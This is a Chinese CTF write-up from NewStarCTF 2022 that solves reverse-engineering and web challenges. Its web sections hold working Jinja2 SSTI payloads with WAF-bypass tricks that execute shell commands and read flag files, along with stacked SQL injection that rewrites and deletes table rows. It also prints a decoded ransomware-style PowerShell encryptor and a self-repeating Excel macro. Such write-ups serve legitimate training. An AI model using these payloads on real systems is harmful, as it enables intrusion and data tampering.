[0xC4, 0xC8, 0xEE, 0xE6, 0xF7, 0xC5, 0x33, 0x7D, 0x5A, 0x59,
0xCE, 0x77, 0x18, 0x66, 0xD1, 0x55, 0x1F, 0xCB, 0xF3, 0xFF,
0xE0, 0xBF, 0x5F, 0x0C, 0x79, 0xFB, 0x81, 0xBA, 0xCF, 0x21,
0xC3, 0x90],
[0x99, 0x6B, 0x23, 0x5B, 0xD8, 0x46, 0x84, 0xFC, 0x11, 0x96,
0x87, 0x78, 0x79, 0x49, 0x28, 0x00, 0xF4, 0xEE, 0xDE, 0x52,
0xD5, 0xBC, 0x78, 0x05, 0x68, 0x1A, 0xEE, 0xE9, 0xB4, 0x62,
0x40, 0x3B],
[0x66, 0xAA, 0x34, 0xC8, 0xA1, 0xC3, 0xE1, 0xF3, 0xD4, 0xBB,
0xC8, 0x79, 0x8A, 0x7C, 0x97, 0x2F, 0xE5, 0xE5, 0xB9, 0x99,
0x22, 0x29, 0x41, 0x4E, 0x3B, 0x05, 0xA7, 0x14, 0x29, 0x8F,
0xCD, 0xE6],
[0x43, 0x5D, 0x09, 0xA5, 0xBA, 0xD4, 0xAA, 0xBA, 0x7B, 0xE0,
0xF9, 0x7A, 0x7B, 0x87, 0xC6, 0xDA, 0xBA, 0xF0, 0xDC, 0xA4,
0x67, 0xA6, 0xCA, 0x77, 0x42, 0xCC, 0x9C, 0x63, 0x56, 0x78,
0x8A, 0x61], # z
[0xF8, 0x94, 0xBA, 0xCA, 0xDB, 0xE1, 0x6F, 0x41, 0x06, 0x5D,
0x4A, 0x7B, 0x8C, 0x72, 0x0D, 0xC1, 0x7B, 0x0F, 0xEF, 0x53,
0x74, 0x43, 0x73, 0x80, 0x65, 0x4F, 0x85, 0xF6, 0x1B, 0x15,
0x5F, 0xE4],
[0xDA, 0x66, 0x30, 0x9C, 0x55, 0x5F, 0xAD, 0xD7, 0x90, 0x3F,
0x24, 0x7D, 0xCE, 0x98, 0x23, 0x0B, 0x61, 0xF9, 0xE5, 0x4D,
0xE6, 0xCD, 0x45, 0xB2, 0xA7, 0xB9, 0xCB, 0x20, 0xB5, 0x13,
0xE9, 0xCA],
[0x87, 0x09, 0xA5, 0x29, 0x6E, 0xA0, 0x16, 0x2E, 0xE7, 0x14,
0x55, 0x7E, 0x8F, 0x23, 0x22, 0x36, 0x06, 0x14, 0xC8, 0xB8,
0xDB, 0x1A, 0x9E, 0x4B, 0x2E, 0xA0, 0x60, 0xDF, 0xF2, 0xEC,
0x46, 0x25],
[0x34, 0xB8, 0xFE, 0x96, 0xC7, 0xF5, 0x23, 0xCD, 0x2A, 0xE9,
0x7E, 0x27, 0xA8, 0x76, 0xA1, 0x05, 0xCF, 0xDB, 0xA3, 0x0F,
0xD0, 0x2F, 0x8F, 0xBC, 0x69, 0xEB, 0x11, 0xAA, 0x3F, 0xB1,
0x73, 0x00],
[0x8F, 0x01, 0x3D, 0x01, 0x16, 0x58, 0xCE, 0x66, 0xFF, 0x4C,
0xBD, 0x26, 0x87, 0x8B, 0x9A, 0x4E, 0xEE, 0x2C, 0xF0, 0xC0,
0xD3, 0x32, 0xA6, 0x53, 0xE6, 0x58, 0x78, 0x87, 0x8A, 0xB4,
0x5E, 0x9D],
]
for i in range(len(test)):
print(test[i] * 32)
flag = [0] * 32
for i in range(len(test)):
for k in range(len(enc)):
if enc[k] == test_[i][k]:
flag[k] = ord(test[i])
for i in range(len(flag)):
print(chr(flag[i]), end='') # flag{umm_I_ an't_calc_1t_@t_all}
flag{umm_I_ an't_calc_1t_@t_all} # 应该是数据问题,检查了一下,缺失字符
猜测 flag{umm_I_can't_calc_1t_@t_all} 正确!!!
【这里应该是patch 数据时,未断点正确造成,数据轻微有误!!!】
funnyOTL
main 函数
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
int main() {
srand(int(time(0))&0xF0000000); // 每次运行main程序的时候产生的随机值都一样
for (int i = 0; i < 24; i++) {
printf("%d ", rand() % 24);
}
printf("\n");
return 0;
}
// 每次生成序列相同!
// rand()*2%24
//4 6 4 2 6 10 10 18 4 8 18 0 4 10 18 2 18 18 18 16 8 22 22 4
//发现自己的随机序列不对,需要动态调试获得,程序生成的随机序列。
0x12,0x6,0x8,0xa,0x6,0x14,0xa,0x14,0x00,0xc,0x2,0x4
一些c++ 的语法函数知识。
# ~string(); 析构函数
# std::replace() 函数的语法
std::replace(
iterator start,
iterator end,
const T& old_value,
const T& new_value);
参数:
iterator start, iterator end- 这些是指向容器中开始和结束位置的迭代器,我们必须在那里运行替换操作。
old_value- 是要搜索并替换为新值的值。
new_value- 要分配的值而不是 old_value。
(173条消息) Reverse_iterator的使用_一休求索的博客-CSDN博客
这是结合动态调试,获得的程序核心加密流程:
for i in range(0, 24, 2):
posCur=i
posLogMe=order[i//2]
string_3[0] = enc[posCur]
string_3[1] = enc[posCur + 1]
string_4[0] = enc[posLogMe]
string_4[1] = enc[posLogMe + 1]
string_3[1] = ~(string_3[1]^posLogMe) &0xff
string_3[0] = string_3[0]^posLogMe&0xff
enc[posCur] = string_4[0]
enc[posCur + 1] = string_4[1]
enc[posLogMe+1] = string_3[1]
enc[posLogMe] = string_3[0]
对以上分析出的程序流程,做逆处理即可:【这里静态分析也是很明了的】
# -*- coding: UTF-8 -*-
enc = [0x4C, 0xAB, 0x78, 0x49, 0x68, 0x9D, 0x51, 0x79, 0x75, 0x5F,
0x7D, 0xC5, 0x63, 0x52, 0x4C, 0xB4, 0x4F, 0x7B, 0x67, 0x61,
0x6F, 0x6E, 0x6B, 0x5F]
print('flag{'+'x'*18+'}') # flag{123456789012345678}
order = [0x12,0x6,0x8,0xa,0x6,0x14,0xa,0x14,0x00,0xc,0x2,0x4] # 动态调试获得
string_3 = [0] * 2
string_4 = [0] * 2
for i in range(22, -2, -2):
posCur=i
posLogMe=order[i//2]
string_3[1]= enc[posLogMe + 1]
string_3[0] =enc[posLogMe]
string_4[0] = enc[posCur]
string_4[1] = enc[posCur + 1]
string_3[1] = (~(string_3[1])&0xff) ^ posLogMe # 这里的处理需要注意
string_3[0] = string_3[0]^posLogMe&0xff
enc[posLogMe] = string_4[0]
enc[posLogMe + 1] = string_4[1]
enc[posCur+1] = string_3[1]
enc[posCur] = string_3[0]
for i in range(len(enc)):
print(chr(enc[i]), end='') # }LTS_wonk_u_w0n_LTO{galf
print()
print('}LTS_wonk_u_w0n_LTO{galf'[::-1])
flag{OTL_n0w_u_know_STL}
Web
BabySSTI_One
<body bgcolor=#E1FFFF><br><p><b>
<center>Welcome to NewStarCTF, Dear CTFer
</center></b></p><br><hr><br>
<center>Try to GET me a NAME</center><!--This is Hint: Flask SSTI is so easy to bypass waf!--></body>
?name=<script>alert(1)</script>
出现弹窗!
?name={{2*8}}
Welcome to NewStarCTF, Dear 16
# 命令执行 ls
?name=
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %}
{% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("ls").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
Get Out!Hacker!
hint: Flask SSTI is so easy to bypass waf
# 读源码payload
?name={% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='catch_warnings' %}
{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}
{% endif %}
{% endfor %}
# for i in ['a','1']
{{ i }}
# endfor
{% for i in ['a','1'] %}
{{ item }}
{% endfor %}
这两条是等效的,但是有个前提,必须在environment中配置line_statement_prefix
即
app.jinja_env.line_statement_prefix="#"
相关SSTI 模板注入 的资料:
(173条消息) 【SSTI模块注入】SSTI+Flask+Python(下):绕过过滤_黑色地带(崛起)的博客-CSDN博客_ssti模块
(173条消息) Flask SSTI注入学习_目标是技术宅的博客-CSDN博客
(173条消息) Flask-SSTI注入_0xActive的博客-CSDN博客_flask ssti注入
(173条消息) SSTI Bypass 学习 (Python3&jinja2_rdd_null的博客-CSDN博客
显然需要测试 waf 黑名单
?name={{"".__class__}}
Get Out!Hacker!
?name={{''[request.args.t1]}}?t1=__class__
Get Out!Hacker!
?name={{""["__c""lass__"]}}
正常,可以知道关键词被waf
?name={{""["__ba""se__"]}}
正常
?name={{""["__base__"]}}
Get Out!Hacker!
显然需要把所有 .__key__ 替换为 ["__ba""se__"]
?name={# for c in []["__c""lass__"]["__ba""se__"]["__su""bclasses__"]() #}
正常
?name=%23 for c in []["__c""lass__"]["__ba""se__"]["__su""bcl""asses__"]() %23
Welcome to NewStarCTF, Dear # for c in []["__c""lass__"]["__ba""se__"]["__su""bcl""asses__"]() #
# catch_warnings 被过滤
?name=%23 if c["__na""me__"] == "sgninraw_hctac"[::-1]%23
# 读源码payload
?name=%23 for c in []["__c""lass__"]["__ba""se__"]["__su""bcl""asses__"]() %23
%23 if c["__na""me__"] == "sgninraw_hctac"[::-1]%23
{{ c["__i""nit__"]["__glo""bals__"]["__bui""ltins__"].open('app.py','r').read() }}
%23 endif %23
%23 endfor %23
?name={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
查看所有模块
?name={{[]["__c""lass__"]["__ba""se__"]["__subcl""asses__"]()}}
/?name=
{% for c in []["__c""lass__"]["__ba""se__"]["__subcl""asses__"]() %}
{% if c.__name__ == 'ca""tch_warnings' %}
{% for b in c["__in""it__"].__globals__.values() %}
{% if b["__c""lass__"]== {}["__c""lass__"] %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("ls").read()') }}
{% endif %}
{% endif %}
{% endfor %}
{% endif %}
{% endfor %}
经过一系列测试,发现waf 好多关键字!最终在舍友提示下,使用hackbar 自带的payload,实现rce
get flag
/?name={{joiner["__in""it__"].__globals__.__builtins__['__import__']('os').popen('ls').read()}}
app.py
?name={{joiner["__in""it__"].__globals__.__builtins__['__import__']('os').popen('ca""t app.py').read()}}
# 源代码
from flask import Flask, request
from jinja2 import Template
import re
app = Flask(__name__)
@app.route("/")
def index():
name = request.args.get('name', 'CTFer')
if not re.findall('class|base|init|mro|flag|cat|more|env', name):
t = Template("
/?name={{joiner["__in""it__"].__globals__.__builtins__['__import__']('os').popen('ls /').read()}}
app
bin
boot
dev
etc
flag_in_here
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var
?name={{joiner["__in""it__"].__globals__.__builtins__['__import__']('os').popen('ca""t /fla""g_in_here').read()}}
flag{29170b66-27fa-4863-9b2e-28f0fbd698c1}
flag{29170b66-27fa-4863-9b2e-28f0fbd698c1}
强大的 hackbar
multiSQL
0x01 sql 注入 测试
username=1' or 1=1 #
火华 11 201 212
username=1' order by 5 # 无回显
username=1' order by 4 # 有回显 说明四列
username=-1' union select 1,2,3,group_concat(schema_name) from information_schema.schemata
同学你在干嘛 有过滤
借助hacker 上工具,简单测试,发现 select union 等被过滤
username=-1' uni/**/on se/**/lect 1,2,3,group_concat(schema_name) from information_schema.schemata #
无回显
注释符,大小写,双写关键字都无法绕过
通用绕过(编码):
如URLEncode编码,ASCII,HEX,unicode编码绕过:
or1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。
username=-1' uni/**/on se/**/lect 1,2,3,group_concat(schema_name) from information_schema.schemata #
cmd='-1\' union select 1,2,3,group_concat(schema_name) from information_schema.schemata #'
for i in range(len(cmd)):
print('CHAR('+str(ord(cmd[i]))+')+',end='')
对绕过这些关键字,没啥思路。尝试堆叠注入!
0x02 尝试堆叠注入
# 尝试堆叠注入,发现可以
username=1';show databases;#
english
information_schema
mysql
performance_schema
username=1';show tables;#
score
username=1';show columns from score;#
# 修改成绩
username=1';update score set listen=500 where username=火华--+
发现 update 被waf
username=1';CHAR(117)+CHAR(112)+CHAR(100)+CHAR(97)+CHAR(116)+CHAR(101) score set listen=500 where username=火华--+
无效
update过滤了
(173条消息) 详解MySQL数据库insert和update语句_wgcc的博客-CSDN博客_insert在数据库中是什么意思
发现 ,insert replace等 指令都可替代 update
username=1';insert into score values("火华",200,200,200);#
insert waf
username=1';replace into score values("火华",200,200,200);#
成功执行
但是,第一条数据不符合,需要排序,或者删除!!!
#低分删除即可:
username=1';delete from score where listen=11;#
成功后,查询分数得到flag
get flag
flag{Ju3t_use_mo2e_t2en_0ne_SQL}
Week4
Re
Hash
测试知道是 hash 算法 是 sha1()。直接爆破,得到flag。
#encoding=utf-8
import hashlib
import itertools
text=['A2F17ED1C6A8BC31769CDF654DF4B8A937042CB6','0CA8A2EDB0C1D34A432A5A4464E0D6ABD847C831','C359D69F3F08BB920F2C3B51133205533462093E','CC5C3FE6E7356A26A134CFF5633349F597C40A9D','4AC4BB3F27F245BA9178651AA5CDEDCBB2862E2A','A01E33F4DCDB6BA1AE9F34A97CF8F6DEEEDF1A8D','D3AF70912A8C1B22CFDECE071BA36BC4662B58FA','9395EAB195D25B676D7D07075D3838A9AC19DF21','FDB43C5EF76ECDA0C1661D6D199B5BFAC1DB538A','DA8E9997A010BE78B20108CE79FEC1FB9C63D8DC','809DA627F1AD01D65864C376E3179B62D9D74261','8F61EE21AC7579626934E0FFB6A62B3D4A82EEC4','E2A954758FDB61F869998E9788B7B7E48480B832','B8E3349B97532B27AA62B8718B68240179158144']
# print(hashlib.sha1('fla'.encode()).hexdigest())
for i in range(len(text)):
print(len(text[i]))
modle = list(itertools.product(
['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J',
'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z','{','}','_','!','@','|'], repeat=3))
i = -1
flag=''
for k in range(len(text)):
while True:
i += 1
# print(modle[i])
str = ''.join(modle[i])
if hashlib.sha1(str.encode()).hexdigest() in text[k].lower():
print('correct: ', str)
# input()
flag+=str
break
else:
print('[-]:'+str)
i=-1
print(flag)
flag{Easy_Hash_And_Y0u_Solve_1t_Quickly!!}
Exception
0x01 程序分析
(173条消息) 逆向程序分析:Windows的main(),启动函数分析_CodeBowl的博客-CSDN博客_windows编程的主函数
查看异常处理块!
; __except(loc_4B18BC) // owned by 4B18A4
mov esp, [ebp+ms_exc.old_esp]
mov eax, [ebp+var_48]
xor eax, 12345678h
mov [ebp+var_48], eax
mov [ebp+ms_exc.registration.TryLevel], 0FFFFFFF
# 触发异常后,将[ebp+var_48]^0x12345678
所以可以依据这个,直接生成出delta[] 数组,进行解密。
tmp=0x9E3779B9
while()
delta+=tmp
tmp=tmp^0x12345678&0xffffffff
【也可以动态调试获得,每组delta[]数据值】
0x02 解密
python 解密脚本
# encoding=utf-8
print('flag{'+'x' * 26+'}')
enc = [0xCE, 0x21, 0xE8, 0x88, 0x70, 0x9D, 0x00, 0x0B, 0x8F, 0xE6,
0xB1, 0x91, 0x96, 0xEA, 0x31, 0x01, 0x7D, 0x9D, 0x20, 0xA3,
0xFB, 0x7D, 0x18, 0xA9, 0xCA, 0xC5, 0x52, 0xC4, 0x53, 0x67,
0x69, 0xA9]
enc1 = [0x88E821CE,0x0B009D70,0x91B1E68F,0x131EA96,0x0A3209D7D,0x0A9187DFB,0x0C452C5CA,0x0A9696753]
# sum=0
# tmp=0x9E3779B9
# for i in range(32):
# sum+=tmp
# tmp^=0x12345678
# print(hex(sum&0xffffffff),end=',')
v9_enc=[0x9E3779B9,0x2a3aa97a,0xc8722333,0x547552f4,0xF2ACCCAD,0x7EAFFC6E,0x1CE77627
,0xA8EAA5E8,0x47221FA1,0xD3254F62,0x715CC91B,0xFD5FF8DC,0x9B977295,0x279AA256
,0xC5D21C0F,0x51D54BD0,0xF00CC589,0x7C0FF54A,0x1A476F03,0xA64A9EC4,0x4482187D
,0xD085483E,0x6EBCC1F7,0xFABFF1B8,0x98F76B71,0x24FA9B32,0xC33214EB,0x4F3544AC
,0xED6CBE65,0x796FEE26,0x17A767DF,0xA3AA97A0]
key = [1, 2, 3, 4]
print()
for k in range(0, 8, 2):
v11 = enc1[k]
v10 = enc1[k + 1]
for i in range(32):
v9=v9_enc[31-i]
v10 -= (key[3] + (v11 >> 5)) ^ (v9 + v11) ^ (key[2] + 16 * v11)
v10= v10&0xffffffff
v11 -= (key[1] + (v10 >> 5)) ^ (v9 + v10) ^ (key[0] + 16 * v10)
v11 = v11 & 0xffffffff
enc1[k] = v11
enc1[k + 1] = v10
for i in range(len(enc1)):
print(hex(enc1[i]),end=',')
flag:
0x33433434,0x31463741,0x41443231,0x37454232,0x34463832,0x35433135,0x30443245,0x38353539,
cpp 解密脚本
#include <stdio.h>
#include <stdint.h>
uint32_t delta[]={0x9E3779B9,0x2a3aa97a,0xc8722333,0x547552f4,0xF2ACCCAD,0x7EAFFC6E,0x1CE77627
,0xA8EAA5E8,0x47221FA1,0xD3254F62,0x715CC91B,0xFD5FF8DC,0x9B977295,0x279AA256
,0xC5D21C0F,0x51D54BD0,0xF00CC589,0x7C0FF54A,0x1A476F03,0xA64A9EC4,0x4482187D
,0xD085483E,0x6EBCC1F7,0xFABFF1B8,0x98F76B71,0x24FA9B32,0xC33214EB,0x4F3544AC
,0xED6CBE65,0x796FEE26,0x17A767DF,0xA3AA97A0};
//加密函数
void encrypt (uint32_t* v, uint32_t* k,int round) {
uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */
/* a key schedule constant */
uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
for (i=0; i < round; i++) { /* basic cycle start */
sum = delta[i];
v0 += ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
v1 += ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
} /* end cycle */
v[0]=v0; v[1]=v1;
}
//解密函数
void decrypt (uint32_t* v, uint32_t* k,int round) {
uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */
/* a key schedule constant */
uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */
for (i=0; i<round; i++) { /* basic cycle start */
sum = delta[round-1-i];
v1 -= ((v0<<4) + k2) ^ (v0 + sum) ^ ((v0>>5) + k3);
v0 -= ((v1<<4) + k0) ^ (v1 + sum) ^ ((v1>>5) + k1);
} /* end cycle */
v[0]=v0; v[1]=v1;
}
int main()
{
uint32_t v[] = { 0x88E821CE,0x0B009D70,0x91B1E68F,0x131EA96,0x0A3209D7D,0x0A9187DFB,0x0C452C5CA,0x0A9696753};
uint32_t k[]={1,2,3,4};
int n=sizeof(v)/sizeof(uint32_t);
int round=32;
// v为要加密的数据是两个32位无符号整数
// k为加密解密密钥,为4个32位无符号整数,即密钥长度为128位
printf("加密前原始数据:\n");
for (int i=0;i<8;i++)
{
for (int j=0;j<4;j++)
{
printf("0x%x,",((v[i]>>j*8)&0xff));
}
}
for (int i=0;i<n/2;i++)
{
decrypt(&v[i*2], k,round);
}
printf("\n解密后的数据:\n");
for (int i=0;i<8;i++)
{
for (int j=0;j<4;j++)
{
printf("%c",((v[i]>>j*8)&0xff)); // 327a6c4304ad5938eaf0efb6cc3e53dc flag{327a6c4304ad5938eaf0efb6cc3e53dc}
}
}
for (int i=0;i<n/2;i++)
{
encrypt(&v[i*2], k ,round);
}
printf("\n加密后的数据:\n");
for (int i=0;i<8;i++)
{
for (int j=0;j<4;j++)
{
printf("0x%x,",((v[i]>>j*8)&0xff));
}
}
return 0;
}
flag{44C3A7F112DA2BE728F451C5E2D09558}
HelpMe
0x01 ps1 解析恢复xlsm
根据提示查阅到相关资料
(174条消息) 还原永恒之蓝下载器PS脚本混淆_FFE4的博客-CSDN博客
从ps1中截取下列数据
echo $(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAKxePWMA/31RT2+bMBS/8yksxAHUYCVI66RMm5TQdJq6LFXJdslycPGDeDU2wi9a0LTv3mdos2yHXZDfD//++UWoGnAompa9Z/HuRiBsCdlUlQPcxx8BU4+xsBDINiWy6Yxl0yyjzzzL5tksTBK+tV+NOnleAaU10sVJED1BT5Jf4Ge6efwBxFz2CLs9m10HXvVBGGkblq7FiWVvrllaABYAkl0k+hCZo9ZBZTsWR8pIOJHi9B17OacaSe11vLpK2C/vuhvnPd3dPZLn2OIfv+R3EC1Wxd8Ji94hNJxKHDuFPc+7vkVbd6I99HwBbi2MqEEOTH439POG47y2EggIV/kyHJF7IaUytc/xX+WXe15gP5/f3+XF2yCqlB7koqZvBR6+N32tKuQn7RqS973chfCnDb8lAtEfQMiF1v6xXRwOMiFtY2XKwbLzmX24vAPa6xn2GwNTSoHC3zjjfNsJ42gDza0yQi+1LZ/i0X7CphM2HvlnMDUeLn34jXKtdeCFvd+fkRad5tYgGGTpN6GPwM7WKfHt8Gi+ALX3+Tn9DYNn5mIx06oCAAA='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()
得到如下:【显然就是核心加密逻辑了】
$timestamp = ([DateTimeOffset](Get-Date "Sat Oct 01 2022 20:22:21")).ToUnixTimeSeconds()
$key = New-Object Byte[] 16
Get-Random -Max 256 -SetSeed $timestamp >$null
for ($index = 0; $index -lt 16; $index++) {$key[$index] = [byte](Get-Random -Max 256)}
$AES = New-Object System.Security.Cryptography.AesManaged
$AES.Key = $key
$AES.Mode = "ECB"
$AES.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$file = "$mypath\mygift.xlsm"
$bytes = [System.IO.File]::ReadAllBytes("$file")
$Encryptor = $AES.CreateEncryptor()
$encdata = $Encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
$Encryptor.Dispose()
$AES.Dispose()
Set-Content -Value $encdata -Encoding Byte "$file.enc"
如上可以分析知道:
# AES 加密
# key 密钥随机生成
# ECB 模式
# 填充模式 PKCS7
# [byte](Get-Random -Max 256)
# Get-Random 获取一个随机数,或从集合中随机选择对象。
# powershell run
PS F:\> echo ([DateTimeOffset](Get-Date "Sat Oct 01 2022 20:22:21")).ToUnixTimeSeconds()
1664626941
PS F:\> $timestamp = ([DateTimeOffset](Get-Date "Sat Oct 01 2022 20:22:21")).ToUnixTimeSeconds()
PS F:\> $key = New-Object Byte[] 16
PS F:\> Get-Random -Max 256 -SetSeed $timestamp >$null
PS F:\> for ($index = 0; $index -lt 16; $index++) {$key[$index] = [byte](Get-Random -Max 256)}
PS F:\> echo $key
105
192
50
118
175
152
128
155
147
80
183
37
190
22
242
78
Get-Random (Microsoft.PowerShell.Utility) - PowerShell | Microsoft Learn
如上,key=[105,192,50,118,175,152,128,155,147,80,183,37,190,22,242,78]
AES 解密脚本
# encoding=utf-8
from Crypto.Cipher import AES
key = [105, 192, 50, 118, 175, 152, 128, 155, 147, 80, 183, 37, 190, 22, 242, 78]
key_b=bytes(key)
with open(r"F:\CTF_\CTF练习\2022_ctf\NewStarCTF 公开赛\Week4\HelpMe\HelpMe\mygift.xlsm.enc", 'rb') as f:
chipher = f.read()
# iv = b'\x00' * 8
print(chipher)
aes = AES.new(key_b, AES.MODE_ECB)
data = aes.decrypt(chipher)
print(data)
# with open(r"F:\CTF_\CTF练习\2022_ctf\NewStarCTF 公开赛\Week4\HelpMe\HelpMe\mygift.xlsm",'wb') as f:
# f.write(data)
0x02 Excel 宏处理
获得.xlsm后打开,发现总有弹窗!
Excel如何打开宏,Excel宏在哪里-百度经验 (baidu.com)
找到 excel 宏,发现有东西
Sub hack()
MsgBox "You have to pay me a lot of money now!"
Dim shell
Dim talk
Set talk = CreateObject("SAPI.SpVoice")
talk.Rate = -3
talk.Volume = 100
talk.Speak "You have to pay me a lot of money now"
Dim a, b, x, arr
a = 20
b = 22
x = 21
arr = Array(2, 19, 16, 21, 14, 24, 18, 15, 5, 0, 6, 23, 13, 29, 11, 9, 7, 10, 20, 12, 1, 26, 30, 31, 27, 25, 3, 28, 8, 22, 17, 4)
Dim i
For i = 1 To 32
If Cells(1, i).Value = "*" Then Exit For
Cells(2, arr(i - 1) + 1).Value = Cells(1, i).Value Xor x
x = (a * x + b) Mod 255
Cells(1, i).Value = "*"
Next
talk.Speak "I have hacked you"
Set sh = CreateObject("Wscript.Shell")
sh.Run ("%comspec% /k tree"), 3, True
ActiveWorkbook.Close
alertTime = Now + TimeValue("00:00:30")
Application.OnTime alertTime, "hack"
End Sub
62 163 115 241 149 89 216 45 20 138 220 8 75 42 135 93 161 60 115 215 169 66 32 132 141 21 184 95 159 3 121 91
0x03 py解密
对上述流程进行解密:
# encoding=utf-8
a = 20
b = 22
x = 21
arr =[2, 19, 16, 21, 14, 24, 18, 15, 5, 0, 6, 23, 13, 29, 11, 9, 7, 10, 20, 12, 1, 26, 30, 31, 27, 25, 3, 28, 8,
22, 17, 4]
enc=[62,163,115,241,149,89,216,45,20,138,220,8,75,42,135,93,161,60,115,215,169,66,32,132,141,21,184,95,159,3,121,91]
flag=''
for i in range(len(enc)):
flag+=chr(enc[arr[i]]^x)
x = (a * x + b)%255
print(flag)
flag{This_is_@_begin_about@hack}
哈德兔的口
0x01 程序分析
jadx 逆向APK 文件
存在 X86 架构 .so 文件,那么程序是可以动态调试的。
先导出.so 文件进行静态分析
cheak 将输入进行 rc4 加密,然后与密文比较。密钥可以动态调试,decode()获得。
0x02 动态调试 .so文件
/* loaded from: classes.dex */
public class MainActivity extends c {
// rc4 加密 密钥key=Hikari#a0344y3y#19301211
/* renamed from: s */
String f3430s = "|%tJ|%pK~%t;6%}d}s\"K|vt;2)y92a=x";
static {
System.loadLibrary("check");
}
public static /* synthetic */ void J(MainActivity mainActivity, EditText editText, View view) {
mainActivity.K(editText, view);
}
/* JADX INFO: Access modifiers changed from: private */
public /* synthetic */ void K(EditText editText, View view) {
String obj = editText.getText().toString();
try { // android.util.Base64
Class<?> cls = Class.forName(decode("}s+=4aur{>IA5w&F+v=G4>#F*\"ll")); // android.util.Base64
obj = new String((byte[]) cls.getMethod(decode("+(#G*ad="), byte[].class, Integer.TYPE).invoke(cls, obj.getBytes(StandardCharsets.UTF_8), 0)); // encode
} catch (ClassNotFoundException e2) {
e2.printStackTrace();
} catch (IllegalAccessException e3) {
e = e3;
e.printStackTrace();
} catch (NoSuchMethodException e4) {
e4.printStackTrace();
} catch (InvocationTargetException e5) {
e = e5;
e.printStackTrace();
}
Toast.makeText(this, decode(check(obj, decode(this.f3430s)) ? "x)#;+)yJ3_|l" : "{>#b4b}94rqJ5(hdxvE;+(9;xv'K*('D4rpD+adG4=4l"), 1).show();
}
public native boolean check(String str, String str2);
public native String decode(String str);
/* JADX INFO: Access modifiers changed from: protected */
@Override // androidx.fragment.app.e, androidx.activity.ComponentActivity, u.d, android.app.Activity
public void onCreate(Bundle bundle) {
super.onCreate(bundle);
setContentView(R.layout.activity_main);
final EditText editText = (EditText) findViewById(R.id.et_passwd);
((Button) findViewById(R.id.btn_check)).setOnClickListener(new View.OnClickListener() { // from class: o1.a
@Override // android.view.View.OnClickListener
public final void onClick(View view) {
MainActivity.J(MainActivity.this, editText, view);
}
});
}
}
通过动态调试知道,程序获取输入后。将输入base64编码,然后RC4加密。
这里有个细节,rc4 算法被魔改了两个点:
可以看到,rc4加密时,先对数据 xor 0xc6。然后加密完成时,又对结果xor 0x73 然后才得到密文。因为这是RC4 加密算法。那么我们用常规rc4 解密出的数据 xor 0x73 xor 0xc6,就可以得到明文。
【具体原理参见 RC4加密算法原理简单理解 - 沉默的赌徒 - 博客园 (cnblogs.com)】
# encoding=utf-8
from Crypto.Cipher import ARC4
import binascii
import hashlib
import base64
key = 'Hikari#a0344y3y#19301211' # 动态调试得到
chipher = [0xF0, 0x90, 0x10, 0xB7, 0xD1, 0x6E, 0x1A, 0xBC, 0xFB, 0x56,
0xE6, 0x93, 0x0C, 0xC0, 0xB5, 0x06, 0x4D, 0xBD, 0xF1, 0x9C,
0xD1, 0x9A, 0x3D, 0x03, 0xCB, 0x16, 0x42, 0x9A, 0x4B, 0x22,
0x10, 0x9D, 0xC6, 0x70, 0x65, 0xAA, 0xC0, 0x3E, 0x54, 0x33,
0xF8, 0x42, 0x2A, 0xE0, 0x52, 0x19, 0xB4, 0x6A, 0xA2, 0x97,
0xEE, 0x2A, 0x9D, 0xC2, 0x32, 0xED]
cipher_text = bytes(chipher)
print(cipher_text)
cipher = ARC4.new(key.encode())
decrypt_text = cipher.decrypt(cipher_text)
# print(decrypt_text)
# decrypt_text = base64.b64decode(decrypt_text)
for i in range(len(decrypt_text)):
print(chr(decrypt_text[i]^0xc6^0x73),end='') # rc4 魔改位置
print()
print(base64.b64decode('ZmxhZ3tRQVFfaG93MmRlY29kZSMjcGxzX3RlQWNoX3RlVmNoX21lISF9'))
# cipher = ARC4.new(key.encode())
# plain_text = cipher.encrypt(decrypt_text)
# print(plain_text)
flag{QAQ_how2decode##pls_teAch_teVch_me!!}
mpz
0x01 搜索相关知识
hint:
lumina may be helpful
六角射线 - IDA 光彩 (hex-rays.com)
[原创]IDA lumina C# 服务端实现-软件逆向-看雪论坛-安全社区|安全招聘|bbs.pediy.com
GitHub - synacktiv/lumina_server: IDA Lumina 功能的本地服务器
查阅到上面感觉有关的链接,可以知道lumina是一种快速库识别和识别的技术。
GitHub - naim94a/lumen: A private Lumina server for IDA Pro
这个可能就是题目说的lumina。但根据文章安装环境配置出错,,,
又尝试 mpz 相关搜索
c语言使用gmp库运算 - 简书 (jianshu.com)
